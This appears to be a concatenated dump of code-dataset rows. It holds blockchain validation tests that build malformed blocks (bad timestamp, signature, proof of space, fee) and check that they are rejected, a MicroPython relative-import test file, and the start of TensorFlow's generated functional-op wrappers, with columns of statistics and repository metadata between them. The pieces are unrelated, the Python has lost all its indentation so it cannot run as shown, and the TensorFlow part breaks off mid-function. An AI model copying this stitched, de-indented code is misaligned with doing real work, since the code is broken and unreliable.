# Time too far in the future
new_header_data = HeaderData(
blocks[9].header.data.height,
blocks[9].header.data.prev_header_hash,
uint64(int(time.time() + 3600 * 3)),
blocks[9].header.data.filter_hash,
blocks[9].header.data.proof_of_space_hash,
blocks[9].header.data.weight,
blocks[9].header.data.total_iters,
blocks[9].header.data.additions_root,
blocks[9].header.data.removals_root,
blocks[9].header.data.farmer_rewards_puzzle_hash,
blocks[9].header.data.total_transaction_fees,
blocks[9].header.data.pool_target,
blocks[9].header.data.aggregated_signature,
blocks[9].header.data.cost,
blocks[9].header.data.extension_data,
blocks[9].header.data.generator_hash,
)
block_bad = FullBlock(
blocks[9].proof_of_space,
blocks[9].proof_of_time,
Header(
new_header_data,
bt.get_plot_signature(
new_header_data, blocks[9].proof_of_space.plot_public_key
),
),
blocks[9].transactions_generator,
blocks[9].transactions_filter,
)
result, removed, error_code = await b.receive_block(block_bad)
assert (result) == ReceiveBlockResult.INVALID_BLOCK
assert error_code == Err.TIMESTAMP_TOO_FAR_IN_FUTURE
@pytest.mark.asyncio
async def test_generator_hash(self, initial_blockchain):
blocks, b = initial_blockchain
new_header_data = HeaderData(
blocks[9].header.data.height,
blocks[9].header.data.prev_header_hash,
blocks[9].header.data.timestamp,
blocks[9].header.data.filter_hash,
blocks[9].header.data.proof_of_space_hash,
blocks[9].header.data.weight,
blocks[9].header.data.total_iters,
blocks[9].header.data.additions_root,
blocks[9].header.data.removals_root,
blocks[9].header.data.farmer_rewards_puzzle_hash,
blocks[9].header.data.total_transaction_fees,
blocks[9].header.data.pool_target,
blocks[9].header.data.aggregated_signature,
blocks[9].header.data.cost,
blocks[9].header.data.extension_data,
bytes([1] * 32),
)
block_bad = FullBlock(
blocks[9].proof_of_space,
blocks[9].proof_of_time,
Header(
new_header_data,
bt.get_plot_signature(
new_header_data, blocks[9].proof_of_space.plot_public_key
),
),
blocks[9].transactions_generator,
blocks[9].transactions_filter,
)
result, removed, error_code = await b.receive_block(block_bad)
assert result == ReceiveBlockResult.INVALID_BLOCK
assert error_code == Err.INVALID_TRANSACTIONS_GENERATOR_HASH
@pytest.mark.asyncio
async def test_plot_signature(self, initial_blockchain):
blocks, b = initial_blockchain
# Time too far in the past
block_bad = FullBlock(
blocks[9].proof_of_space,
blocks[9].proof_of_time,
Header(
blocks[9].header.data,
AugSchemeMPL.sign(
AugSchemeMPL.key_gen(bytes([5] * 32)), token_bytes(32)
),
),
blocks[9].transactions_generator,
blocks[9].transactions_filter,
)
result, removed, error_code = await b.receive_block(block_bad)
assert result == ReceiveBlockResult.INVALID_BLOCK
assert error_code == Err.INVALID_PLOT_SIGNATURE
@pytest.mark.asyncio
async def test_invalid_pos(self, initial_blockchain):
blocks, b = initial_blockchain
bad_pos_proof = bytearray([i for i in blocks[9].proof_of_space.proof])
bad_pos_proof[0] = uint8((bad_pos_proof[0] + 1) % 256)
bad_pos = ProofOfSpace(
blocks[9].proof_of_space.challenge_hash,
blocks[9].proof_of_space.pool_public_key,
blocks[9].proof_of_space.plot_public_key,
blocks[9].proof_of_space.size,
bytes(bad_pos_proof),
)
new_header_data = HeaderData(
blocks[9].header.data.height,
blocks[9].header.data.prev_header_hash,
blocks[9].header.data.timestamp,
blocks[9].header.data.filter_hash,
bad_pos.get_hash(),
blocks[9].header.data.weight,
blocks[9].header.data.total_iters,
blocks[9].header.data.additions_root,
blocks[9].header.data.removals_root,
blocks[9].header.data.farmer_rewards_puzzle_hash,
blocks[9].header.data.total_transaction_fees,
blocks[9].header.data.pool_target,
blocks[9].header.data.aggregated_signature,
blocks[9].header.data.cost,
blocks[9].header.data.extension_data,
blocks[9].header.data.generator_hash,
)
# Proof of space invalid
block_bad = FullBlock(
bad_pos,
blocks[9].proof_of_time,
Header(
new_header_data,
bt.get_plot_signature(
new_header_data, blocks[9].proof_of_space.plot_public_key
),
),
blocks[9].transactions_generator,
blocks[9].transactions_filter,
)
result, removed, error_code = await b.receive_block(block_bad)
assert result == ReceiveBlockResult.INVALID_BLOCK
assert error_code == Err.INVALID_POSPACE
@pytest.mark.asyncio
async def test_invalid_pos_hash(self, initial_blockchain):
blocks, b = initial_blockchain
bad_pos_proof = bytearray([i for i in blocks[9].proof_of_space.proof])
bad_pos_proof[0] = uint8((bad_pos_proof[0] + 1) % 256)
bad_pos = ProofOfSpace(
blocks[9].proof_of_space.challenge_hash,
blocks[9].proof_of_space.pool_public_key,
blocks[9].proof_of_space.plot_public_key,
blocks[9].proof_of_space.size,
bytes(bad_pos_proof),
)
new_header_data = HeaderData(
blocks[9].header.data.height,
blocks[9].header.data.prev_header_hash,
blocks[9].header.data.timestamp,
blocks[9].header.data.filter_hash,
bad_pos.get_hash(),
blocks[9].header.data.weight,
blocks[9].header.data.total_iters,
blocks[9].header.data.additions_root,
blocks[9].header.data.removals_root,
blocks[9].header.data.farmer_rewards_puzzle_hash,
blocks[9].header.data.total_transaction_fees,
blocks[9].header.data.pool_target,
blocks[9].header.data.aggregated_signature,
blocks[9].header.data.cost,
blocks[9].header.data.extension_data,
blocks[9].header.data.generator_hash,
)
# Proof of space has invalid
block_bad = FullBlock(
blocks[9].proof_of_space,
blocks[9].proof_of_time,
Header(
new_header_data,
bt.get_plot_signature(
new_header_data, blocks[9].proof_of_space.plot_public_key
),
),
blocks[9].transactions_generator,
blocks[9].transactions_filter,
)
result, removed, error_code = await b.receive_block(block_bad)
assert result == ReceiveBlockResult.INVALID_BLOCK
assert error_code == Err.INVALID_POSPACE_HASH
@pytest.mark.asyncio
async def test_invalid_filter_hash(self, initial_blockchain):
blocks, b = initial_blockchain
new_header_data = HeaderData(
blocks[9].header.data.height,
blocks[9].header.data.prev_header_hash,
blocks[9].header.data.timestamp,
bytes32(bytes([3] * 32)),
blocks[9].header.data.proof_of_space_hash,
blocks[9].header.data.weight,
blocks[9].header.data.total_iters,
blocks[9].header.data.additions_root,
blocks[9].header.data.removals_root,
blocks[9].header.data.farmer_rewards_puzzle_hash,
blocks[9].header.data.total_transaction_fees,
blocks[9].header.data.pool_target,
blocks[9].header.data.aggregated_signature,
blocks[9].header.data.cost,
blocks[9].header.data.extension_data,
blocks[9].header.data.generator_hash,
)
block_bad = FullBlock(
blocks[9].proof_of_space,
blocks[9].proof_of_time,
Header(
new_header_data,
bt.get_plot_signature(
new_header_data, blocks[9].proof_of_space.plot_public_key
),
),
blocks[9].transactions_generator,
blocks[9].transactions_filter,
)
result, removed, error_code = await b.receive_block(block_bad)
assert result == ReceiveBlockResult.INVALID_BLOCK
assert error_code == Err.INVALID_TRANSACTIONS_FILTER_HASH
@pytest.mark.asyncio
async def test_invalid_max_height(self, initial_blockchain):
blocks, b = initial_blockchain
print(blocks[9].header)
pool_target = PoolTarget(
blocks[9].header.data.pool_target.puzzle_hash, uint32(8)
)
agg_sig = bt.get_pool_key_signature(
pool_target, blocks[9].proof_of_space.pool_public_key
)
assert agg_sig is not None
new_header_data = HeaderData(
blocks[9].header.data.height,
blocks[9].header.data.prev_header_hash,
blocks[9].header.data.timestamp,
blocks[9].header.data.filter_hash,
blocks[9].header.data.proof_of_space_hash,
blocks[9].header.data.weight,
blocks[9].header.data.total_iters,
blocks[9].header.data.additions_root,
blocks[9].header.data.removals_root,
blocks[9].header.data.farmer_rewards_puzzle_hash,
blocks[9].header.data.total_transaction_fees,
pool_target,
agg_sig,
blocks[9].header.data.cost,
blocks[9].header.data.extension_data,
blocks[9].header.data.generator_hash,
)
block_bad = FullBlock(
blocks[9].proof_of_space,
blocks[9].proof_of_time,
Header(
new_header_data,
bt.get_plot_signature(
new_header_data, blocks[9].proof_of_space.plot_public_key
),
),
blocks[9].transactions_generator,
blocks[9].transactions_filter,
)
result, removed, error_code = await b.receive_block(block_bad)
assert result == ReceiveBlockResult.INVALID_BLOCK
assert error_code == Err.INVALID_POOL_TARGET
@pytest.mark.asyncio
async def test_invalid_pool_sig(self, initial_blockchain):
blocks, b = initial_blockchain
pool_target = PoolTarget(
blocks[9].header.data.pool_target.puzzle_hash, uint32(10)
)
agg_sig = bt.get_pool_key_signature(
pool_target, blocks[9].proof_of_space.pool_public_key
)
assert agg_sig is not None
new_header_data = HeaderData(
blocks[9].header.data.height,
blocks[9].header.data.prev_header_hash,
blocks[9].header.data.timestamp,
blocks[9].header.data.filter_hash,
blocks[9].header.data.proof_of_space_hash,
blocks[9].header.data.weight,
blocks[9].header.data.total_iters,
blocks[9].header.data.additions_root,
blocks[9].header.data.removals_root,
blocks[9].header.data.farmer_rewards_puzzle_hash,
blocks[9].header.data.total_transaction_fees,
blocks[9].header.data.pool_target,
agg_sig,
blocks[9].header.data.cost,
blocks[9].header.data.extension_data,
blocks[9].header.data.generator_hash,
)
block_bad = FullBlock(
blocks[9].proof_of_space,
blocks[9].proof_of_time,
Header(
new_header_data,
bt.get_plot_signature(
new_header_data, blocks[9].proof_of_space.plot_public_key
),
),
blocks[9].transactions_generator,
blocks[9].transactions_filter,
)
result, removed, error_code = await b.receive_block(block_bad)
assert result == ReceiveBlockResult.INVALID_BLOCK
assert error_code == Err.BAD_AGGREGATE_SIGNATURE
@pytest.mark.asyncio
async def test_invalid_fees_amount(self, initial_blockchain):
blocks, b = initial_blockchain
new_header_data = HeaderData(
blocks[9].header.data.height,
blocks[9].header.data.prev_header_hash,
blocks[9].header.data.timestamp,
blocks[9].header.data.filter_hash,
blocks[9].header.data.proof_of_space_hash,
blocks[9].header.data.weight,
blocks[9].header.data.total_iters,
blocks[9].header.data.additions_root,
blocks[9].header.data.removals_root,
blocks[9].header.data.farmer_rewards_puzzle_hash,
blocks[9].header.data.total_transaction_fees + 1,
blocks[9].header.data.pool_target,
blocks[9].header.data.aggregated_signature,
blocks[9].header.data.cost,
blocks[9].header.data.extension_data,
blocks[9].header.data.generator_hash,
)
# Coinbase amount invalid
block_bad = FullBlock(
blocks[9].proof_of_space,
blocks[9].proof_of_time,
Header(
new_header_data,
bt.get_plot_signature(
new_header_data, blocks[9].proof_of_space.plot_public_key
),
),
blocks[9].transactions_generator,
blocks[9].transactions_filter,
)
result, removed, error_code = await b.receive_block(block_bad)
assert result == ReceiveBlockResult.INVALID_BLOCK
assert error_code == Err.INVALID_BLOCK_FEE_AMOUNT
@pytest.mark.asyncio
async def test_difficulty_change(self):
num_blocks = 10
# Make it much faster than target time, 1 second instead of 10 seconds, so difficulty goes up
blocks = bt.get_consecutive_blocks(test_constants, num_blocks, [], 1)
db_path = Path("blockchain_test.db")
if db_path.exists():
db_path.unlink()
connection = await aiosqlite.connect(db_path)
coin_store = await CoinStore.create(connection)
store = await BlockStore.create(connection)
b: Blockchain = await Blockchain.create(coin_store, store, test_constants)
for i in range(1, num_blocks):
result, removed, error_code = await b.receive_block(blocks[i])
assert result == ReceiveBlockResult.ADDED_TO_HEAD
assert error_code is None
diff_6 = b.get_next_difficulty(blocks[5].header)
diff_7 = b.get_next_difficulty(blocks[6].header)
diff_8 = b.get_next_difficulty(blocks[7].header)
# diff_9 = b.get_next_difficulty(blocks[8].header)
assert diff_6 == diff_7
assert diff_8 > diff_7
assert (diff_8 / diff_7) <= test_constants.DIFFICULTY_FACTOR
assert (b.get_next_min_iters(blocks[1])) == test_constants.MIN_ITERS_STARTING
assert (b.get_next_min_iters(blocks[6])) == (b.get_next_min_iters(blocks[5]))
assert (b.get_next_min_iters(blocks[7])) > (b.get_next_min_iters(blocks[6]))
assert (b.get_next_min_iters(blocks[8])) == (b.get_next_min_iters(blocks[7]))
await connection.close()
b.shut_down()
class TestReorgs:
@pytest.mark.asyncio
async def test_basic_reorg(self):
blocks = bt.get_consecutive_blocks(test_constants, 15, [], 9)
db_path = Path("blockchain_test.db")
if db_path.exists():
db_path.unlink()
connection = await aiosqlite.connect(db_path)
coin_store = await CoinStore.create(connection)
store = await BlockStore.create(connection)
b: Blockchain = await Blockchain.create(coin_store, store, test_constants)
for i in range(1, len(blocks)):
await b.receive_block(blocks[i])
assert b.get_current_tips()[0].height == 15
blocks_reorg_chain = bt.get_consecutive_blocks(
test_constants, 7, blocks[:10], 9, b"2"
)
for i in range(1, len(blocks_reorg_chain)):
reorg_block = blocks_reorg_chain[i]
result, removed, error_code = await b.receive_block(reorg_block)
if reorg_block.height < 10:
assert result == ReceiveBlockResult.ALREADY_HAVE_BLOCK
elif reorg_block.height < 14:
assert result == ReceiveBlockResult.ADDED_AS_ORPHAN
elif reorg_block.height >= 15:
assert result == ReceiveBlockResult.ADDED_TO_HEAD
assert error_code is None
assert b.get_current_tips()[0].height == 16
await connection.close()
b.shut_down()
@pytest.mark.asyncio
async def test_reorg_from_genesis(self):
blocks = bt.get_consecutive_blocks(test_constants, 20, [], 9, b"0")
db_path = Path("blockchain_test.db")
if db_path.exists():
db_path.unlink()
connection = await aiosqlite.connect(db_path)
coin_store = await CoinStore.create(connection)
store = await BlockStore.create(connection)
b: Blockchain = await Blockchain.create(coin_store, store, test_constants)
for i in range(1, len(blocks)):
await b.receive_block(blocks[i])
assert b.get_current_tips()[0].height == 20
# Reorg from genesis
blocks_reorg_chain = bt.get_consecutive_blocks(
test_constants, 21, [blocks[0]], 9, b"3"
)
for i in range(1, len(blocks_reorg_chain)):
reorg_block = blocks_reorg_chain[i]
result, removed, error_code = await b.receive_block(reorg_block)
if reorg_block.height == 0:
assert result == ReceiveBlockResult.ALREADY_HAVE_BLOCK
elif reorg_block.height < 19:
assert result == ReceiveBlockResult.ADDED_AS_ORPHAN
else:
assert result == ReceiveBlockResult.ADDED_TO_HEAD
assert b.get_current_tips()[0].height == 21
# Reorg back to original branch
blocks_reorg_chain_2 = bt.get_consecutive_blocks(
test_constants, 3, blocks[:-1], 9, b"4"
)
result, _, error_code = await b.receive_block(blocks_reorg_chain_2[20])
assert result == ReceiveBlockResult.ADDED_AS_ORPHAN
result, _, error_code = await b.receive_block(blocks_reorg_chain_2[21])
assert result == ReceiveBlockResult.ADDED_TO_HEAD
result, _, error_code = await b.receive_block(blocks_reorg_chain_2[22])
assert result == ReceiveBlockResult.ADDED_TO_HEAD
await connection.close()
b.shut_down()
@pytest.mark.asyncio
async def test_lca(self):
blocks = bt.get_consecutive_blocks(test_constants, 5, [], 9, b"0")
db_path = Path("blockchain_test.db")
if db_path.exists():
db_path.unlink()
connection = await aiosqlite.connect(db_path)
coin_store = await CoinStore.create(connection)
store = await BlockStore.create(connection)
b: Blockchain = await Blockchain.create(coin_store, store, test_constants)
for i in range(1, len(blocks)):
await b.receive_block(blocks[i])
assert b.lca_block.header_hash == blocks[3].header_hash
block_5_2 = bt.get_consecutive_blocks(test_constants, 1, blocks[:5], 9, b"1")
block_5_3 = bt.get_consecutive_blocks(test_constants, 1, blocks[:5], 9, b"2")
await b.receive_block(block_5_2[5])
assert b.lca_block.header_hash == blocks[4].header_hash
await b.receive_block(block_5_3[5])
assert b.lca_block.header_hash == blocks[4].header_hash
reorg = bt.get_consecutive_blocks(test_constants, 6, [], 9, b"3")
for i in range(1, len(reorg)):
await b.receive_block(reorg[i])
assert b.lca_block.header_hash == blocks[0].header_hash
await connection.close()
b.shut_down()
@pytest.mark.asyncio
async def test_find_fork_point(self):
blocks = bt.get_consecutive_blocks(test_constants, 10, [], 9, b"7")
blocks_2 = bt.get_consecutive_blocks(test_constants, 6, blocks[:5], 9, b"8")
blocks_3 = bt.get_consecutive_blocks(test_constants, 8, blocks[:3], 9, b"9")
blocks_reorg = bt.get_consecutive_blocks(test_constants, 3, blocks[:9], 9, b"9")
db_path = Path("blockchain_test.db")
if db_path.exists():
db_path.unlink()
connection = await aiosqlite.connect(db_path)
coin_store = await CoinStore.create(connection)
store = await BlockStore.create(connection)
b: Blockchain = await Blockchain.create(coin_store, store, test_constants)
for i in range(1, len(blocks)):
await b.receive_block(blocks[i])
for i in range(1, len(blocks_2)):
await b.receive_block(blocks_2[i])
assert (
find_fork_point_in_chain(b.headers, blocks[10].header, blocks_2[10].header)
== 4
)
for i in range(1, len(blocks_3)):
await b.receive_block(blocks_3[i])
assert (
find_fork_point_in_chain(b.headers, blocks[10].header, blocks_3[10].header)
== 2
)
assert b.lca_block.data == blocks[2].header.data
for i in range(1, len(blocks_reorg)):
await b.receive_block(blocks_reorg[i])
assert (
find_fork_point_in_chain(
b.headers, blocks[10].header, blocks_reorg[10].header
)
== 8
)
assert (
find_fork_point_in_chain(
b.headers, blocks_2[10].header, blocks_reorg[10].header
)
== 4
)
assert b.lca_block.data == blocks[4].header.data
await connection.close()
b.shut_down()
@pytest.mark.asyncio
async def test_get_header_hashes(self):
blocks = bt.get_consecutive_blocks(test_constants, 5, [], 9, b"0")
db_path = Path("blockchain_test.db")
if db_path.exists():
db_path.unlink()
connection = await aiosqlite.connect(db_path)
coin_store = await CoinStore.create(connection)
store = await BlockStore.create(connection)
b: Blockchain = await Blockchain.create(coin_store, store, test_constants)
for i in range(1, len(blocks)):
await b.receive_block(blocks[i])
header_hashes = b.get_header_hashes(blocks[-1].header_hash)
assert len(header_hashes) == 6
assert header_hashes == [block.header_hash for block in blocks]
await connection.close()
b.shut_down()
| 40.025469 | 101 | 0.619311 | 3,646 | 29,859 | 4.807186 | 0.061711 | 0.088264 | 0.115707 | 0.14937 | 0.865921 | 0.848519 | 0.815884 | 0.772351 | 0.737548 | 0.722656 | 0 | 0.022449 | 0.283901 | 29,859 | 745 | 102 | 40.079195 | 0.797259 | 0.013095 | 0 | 0.715582 | 0 | 0 | 0.011211 | 0.002522 | 0 | 0 | 0 | 0 | 0.099849 | 1 | 0.001513 | false | 0 | 0.028744 | 0 | 0.034796 | 0.001513 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
7cbb3c6d735272e5f7ef9a5e1125aa8a9ecf686b | 324 | py | Python | tests/bytecode/mp-tests/import6.py | LabAixBidouille/micropython | 11aa6ba456287d6c80598a7ebbebd2887ce8f5a2 | [
"MIT"
] | 303 | 2015-07-11T17:12:55.000Z | 2018-01-08T03:02:37.000Z | tests/bytecode/mp-tests/import6.py | LabAixBidouille/micropython | 11aa6ba456287d6c80598a7ebbebd2887ce8f5a2 | [
"MIT"
] | 13 | 2016-05-12T16:51:22.000Z | 2018-01-10T22:33:25.000Z | tests/bytecode/mp-tests/import6.py | LabAixBidouille/micropython | 11aa6ba456287d6c80598a7ebbebd2887ce8f5a2 | [
"MIT"
] | 26 | 2018-01-18T09:15:33.000Z | 2022-02-07T13:09:14.000Z | from . import bar
from .. import bar
from ... import bar
from .... import bar
from ..... import bar
from ...... import bar
from . import bar as abc
from .foo import bar
from ..foo import bar
from ...foo import bar
from .foo.bar import baz
from ..foo.bar import baz
from ...foo.bar import baz
from .foo.bar import baz as abc
| 21.6 | 31 | 0.694444 | 57 | 324 | 3.947368 | 0.122807 | 0.4 | 0.52 | 0.453333 | 0.955556 | 0.955556 | 0.955556 | 0.955556 | 0.955556 | 0.955556 | 0 | 0 | 0.185185 | 324 | 14 | 32 | 23.142857 | 0.852273 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 11 |
7cfca439f796e70e27d9b8a7c669af5c03cfbf44 | 56,906 | py | Python | python3/lib/python3.6/site-packages/tensorflow/python/ops/gen_functional_ops.py | TruongThuyLiem/keras2tensorflow | 726f2370160701081cb43fbd8b56154c10d7ad63 | [
"MIT"
] | 3 | 2020-10-12T15:47:01.000Z | 2022-01-14T19:51:26.000Z | python3/lib/python3.6/site-packages/tensorflow/python/ops/gen_functional_ops.py | TruongThuyLiem/keras2tensorflow | 726f2370160701081cb43fbd8b56154c10d7ad63 | [
"MIT"
] | null | null | null | python3/lib/python3.6/site-packages/tensorflow/python/ops/gen_functional_ops.py | TruongThuyLiem/keras2tensorflow | 726f2370160701081cb43fbd8b56154c10d7ad63 | [
"MIT"
] | 2 | 2020-08-03T13:02:06.000Z | 2020-11-04T03:15:44.000Z | """Python wrappers around TensorFlow ops.
This file is MACHINE GENERATED! Do not edit.
Original C++ source file: functional_ops.cc
"""
import collections as _collections
import six as _six
from tensorflow.python import pywrap_tensorflow as _pywrap_tensorflow
from tensorflow.python.eager import context as _context
from tensorflow.python.eager import core as _core
from tensorflow.python.eager import execute as _execute
from tensorflow.python.framework import dtypes as _dtypes
from tensorflow.python.framework import errors as _errors
from tensorflow.python.framework import tensor_shape as _tensor_shape
from tensorflow.core.framework import op_def_pb2 as _op_def_pb2
# Needed to trigger the call to _set_call_cpp_shape_fn.
from tensorflow.python.framework import common_shapes as _common_shapes
from tensorflow.python.framework import op_def_registry as _op_def_registry
from tensorflow.python.framework import ops as _ops
from tensorflow.python.framework import op_def_library as _op_def_library
from tensorflow.python.util.deprecation import deprecated_endpoints
from tensorflow.python.util import dispatch as _dispatch
from tensorflow.python.util.tf_export import tf_export
from tensorflow.python.util.tf_export import kwarg_only as _kwarg_only
from tensorflow.tools.docs import doc_controls as _doc_controls
def case(branch_index, input, Tout, branches, output_shapes=[], name=None):
r"""An n-way switch statement which calls a single branch function.
An n-way switch statement, implementing the following:
```
switch (branch_index) {
case 0:
output = branches[0](input);
break;
case 1:
output = branches[1](input);
break;
...
case [[nbranches-1]]:
default:
output = branches[nbranches-1](input);
break;
}
```
Args:
branch_index: A `Tensor` of type `int32`.
The branch selector, an int32 Tensor.
input: A list of `Tensor` objects.
A list of input tensors passed to the branch function.
Tout: A list of `tf.DTypes`. A list of output types.
branches: A list of functions decorated with @Defun that has length `>= 1`.
A list of functions each of which takes 'inputs' and returns a list of
tensors, whose types are the same as what every other branch returns.
output_shapes: An optional list of shapes (each a `tf.TensorShape` or list of `ints`). Defaults to `[]`.
name: A name for the operation (optional).
Returns:
A list of `Tensor` objects of type `Tout`.
"""
_ctx = _context._context or _context.context()
if _ctx is not None and _ctx._thread_local_data.is_eager:
try:
_result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
_ctx._context_handle, _ctx._thread_local_data.device_name, "Case",
name, _ctx._post_execution_callbacks, branch_index, input, "Tout",
Tout, "branches", branches, "output_shapes", output_shapes)
return _result
except _core._FallbackException:
try:
return case_eager_fallback(
branch_index, input, Tout=Tout, branches=branches,
output_shapes=output_shapes, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
except _core._NotOkStatusException as e:
if name is not None:
message = e.message + " name: " + name
else:
message = e.message
_six.raise_from(_core._status_to_exception(e.code, message), None)
# Add nodes to the TensorFlow graph.
if not isinstance(Tout, (list, tuple)):
raise TypeError(
"Expected list for 'Tout' argument to "
"'case' Op, not %r." % Tout)
Tout = [_execute.make_type(_t, "Tout") for _t in Tout]
if not isinstance(branches, (list, tuple)):
raise TypeError(
"Expected list for 'branches' argument to "
"'case' Op, not %r." % branches)
if output_shapes is None:
output_shapes = []
if not isinstance(output_shapes, (list, tuple)):
raise TypeError(
"Expected list for 'output_shapes' argument to "
"'case' Op, not %r." % output_shapes)
output_shapes = [_execute.make_shape(_s, "output_shapes") for _s in output_shapes]
_, _, _op = _op_def_lib._apply_op_helper(
"Case", branch_index=branch_index, input=input, Tout=Tout,
branches=branches, output_shapes=output_shapes, name=name)
_result = _op.outputs[:]
if not _result:
return _op
_inputs_flat = _op.inputs
_attrs = ("Tin", _op.get_attr("Tin"), "Tout", _op.get_attr("Tout"),
"branches", _op.get_attr("branches"), "output_shapes",
_op.get_attr("output_shapes"))
_execute.record_gradient(
"Case", _inputs_flat, _attrs, _result, name)
return _result
def Case(branch_index, input, Tout, branches, output_shapes=[], name=None):
return case(branch_index=branch_index, input=input, Tout=Tout, branches=branches, output_shapes=output_shapes, name=name)
Case.__doc__ = case.__doc__
Case = _doc_controls.do_not_generate_docs(_kwarg_only(Case))
tf_export("raw_ops.Case")(Case)
def case_eager_fallback(branch_index, input, Tout, branches, output_shapes=[], name=None, ctx=None):
r"""This is the slowpath function for Eager mode.
This is for function case
"""
_ctx = ctx if ctx else _context.context()
if not isinstance(Tout, (list, tuple)):
raise TypeError(
"Expected list for 'Tout' argument to "
"'case' Op, not %r." % Tout)
Tout = [_execute.make_type(_t, "Tout") for _t in Tout]
if not isinstance(branches, (list, tuple)):
raise TypeError(
"Expected list for 'branches' argument to "
"'case' Op, not %r." % branches)
if output_shapes is None:
output_shapes = []
if not isinstance(output_shapes, (list, tuple)):
raise TypeError(
"Expected list for 'output_shapes' argument to "
"'case' Op, not %r." % output_shapes)
output_shapes = [_execute.make_shape(_s, "output_shapes") for _s in output_shapes]
_attr_Tin, input = _execute.convert_to_mixed_eager_tensors(input, _ctx)
branch_index = _ops.convert_to_tensor(branch_index, _dtypes.int32)
_inputs_flat = [branch_index] + list(input)
_attrs = ("Tin", _attr_Tin, "Tout", Tout, "branches", branches,
"output_shapes", output_shapes)
_result = _execute.execute(b"Case", len(Tout), inputs=_inputs_flat,
attrs=_attrs, ctx=_ctx, name=name)
_execute.record_gradient(
"Case", _inputs_flat, _attrs, _result, name)
return _result
def fake_param(dtype, shape, name=None):
r""" This op is used as a placeholder in If branch functions. It doesn't provide a
valid output when run, so must either be removed (e.g. replaced with a
function input) or guaranteed not to be used (e.g. if mirroring an
intermediate output needed for the gradient computation of the other branch).
Args:
dtype: A `tf.DType`. The type of the output.
shape: A `tf.TensorShape` or list of `ints`.
The purported shape of the output. This is only used for shape inference;
the output will not necessarily have this shape. Can be a partial shape.
name: A name for the operation (optional).
Returns:
A `Tensor` of type `dtype`.
"""
_ctx = _context._context or _context.context()
if _ctx is not None and _ctx._thread_local_data.is_eager:
try:
_result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
_ctx._context_handle, _ctx._thread_local_data.device_name,
"FakeParam", name, _ctx._post_execution_callbacks, "dtype", dtype,
"shape", shape)
return _result
except _core._FallbackException:
try:
return fake_param_eager_fallback(
dtype=dtype, shape=shape, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
except _core._NotOkStatusException as e:
if name is not None:
message = e.message + " name: " + name
else:
message = e.message
_six.raise_from(_core._status_to_exception(e.code, message), None)
# Add nodes to the TensorFlow graph.
dtype = _execute.make_type(dtype, "dtype")
shape = _execute.make_shape(shape, "shape")
_, _, _op = _op_def_lib._apply_op_helper(
"FakeParam", dtype=dtype, shape=shape, name=name)
_result = _op.outputs[:]
_inputs_flat = _op.inputs
_attrs = ("dtype", _op.get_attr("dtype"), "shape", _op.get_attr("shape"))
_execute.record_gradient(
"FakeParam", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
def FakeParam(dtype, shape, name=None):
return fake_param(dtype=dtype, shape=shape, name=name)
FakeParam.__doc__ = fake_param.__doc__
FakeParam = _doc_controls.do_not_generate_docs(_kwarg_only(FakeParam))
tf_export("raw_ops.FakeParam")(FakeParam)
def fake_param_eager_fallback(dtype, shape, name=None, ctx=None):
r"""This is the slowpath function for Eager mode.
This is for function fake_param
"""
_ctx = ctx if ctx else _context.context()
dtype = _execute.make_type(dtype, "dtype")
shape = _execute.make_shape(shape, "shape")
_inputs_flat = []
_attrs = ("dtype", dtype, "shape", shape)
_result = _execute.execute(b"FakeParam", 1, inputs=_inputs_flat,
attrs=_attrs, ctx=_ctx, name=name)
_execute.record_gradient(
"FakeParam", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
def _for(start, limit, delta, input, body, name=None):
r""" ```python
output = input;
for i in range(start, limit, delta)
output = body(i, output);
```
Args:
start: A `Tensor` of type `int32`. The lower bound. An int32
limit: A `Tensor` of type `int32`. The upper bound. An int32
delta: A `Tensor` of type `int32`. The increment. An int32
input: A list of `Tensor` objects.
A list of input tensors whose types are T.
body: A function decorated with @Defun.
A function that takes a list of tensors (int32, T) and returns another
list of tensors (T).
name: A name for the operation (optional).
Returns:
A list of `Tensor` objects. Has the same type as `input`.
"""
_ctx = _context._context or _context.context()
if _ctx is not None and _ctx._thread_local_data.is_eager:
try:
_result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
_ctx._context_handle, _ctx._thread_local_data.device_name, "For",
name, _ctx._post_execution_callbacks, start, limit, delta, input,
"body", body)
return _result
except _core._FallbackException:
try:
return _for_eager_fallback(
start, limit, delta, input, body=body, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
except _core._NotOkStatusException as e:
if name is not None:
message = e.message + " name: " + name
else:
message = e.message
_six.raise_from(_core._status_to_exception(e.code, message), None)
# Add nodes to the TensorFlow graph.
_, _, _op = _op_def_lib._apply_op_helper(
"For", start=start, limit=limit, delta=delta, input=input, body=body,
name=name)
_result = _op.outputs[:]
_inputs_flat = _op.inputs
_attrs = ("T", _op.get_attr("T"), "body", _op.get_attr("body"))
_execute.record_gradient(
"For", _inputs_flat, _attrs, _result, name)
return _result
def For(start, limit, delta, input, body, name=None):
return _for(start=start, limit=limit, delta=delta, input=input, body=body, name=name)
For.__doc__ = _for.__doc__
For = _doc_controls.do_not_generate_docs(_kwarg_only(For))
tf_export("raw_ops.For")(For)
def _for_eager_fallback(start, limit, delta, input, body, name=None, ctx=None):
r"""This is the slowpath function for Eager mode.
This is for function _for
"""
_ctx = ctx if ctx else _context.context()
_attr_T, input = _execute.convert_to_mixed_eager_tensors(input, _ctx)
